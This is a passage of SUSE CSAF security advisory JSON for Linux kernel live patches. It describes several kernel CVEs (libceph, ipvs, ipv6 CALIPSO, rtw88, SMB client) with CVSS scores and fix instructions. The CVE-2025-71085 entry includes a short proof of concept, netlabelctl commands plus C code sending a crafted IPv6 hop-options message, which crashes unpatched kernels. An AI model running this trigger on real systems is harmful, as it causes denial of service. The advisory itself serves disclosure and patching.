13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1101-1
Vulnerability from csaf_suse - Published: 2026-03-27 01:33 - Updated: 2026-03-27 01:33
Summary
Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.3 fixes various security issues
The following security issues were fixed:
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1101,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1101
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
7.8 (High)
7.3 (High)
7.5 (High)
7.5 (High)
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.3 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1101,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1101",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1101-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1101-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261101-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1101-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025011.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 1 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T01:33:43Z",
"generator": {
"date": "2026-03-27T01:33:43Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1101-1",
"initial_release_date": "2026-03-27T01:33:43Z",
"revision_history": [
{
"date": "2026-03-27T01:33:43Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
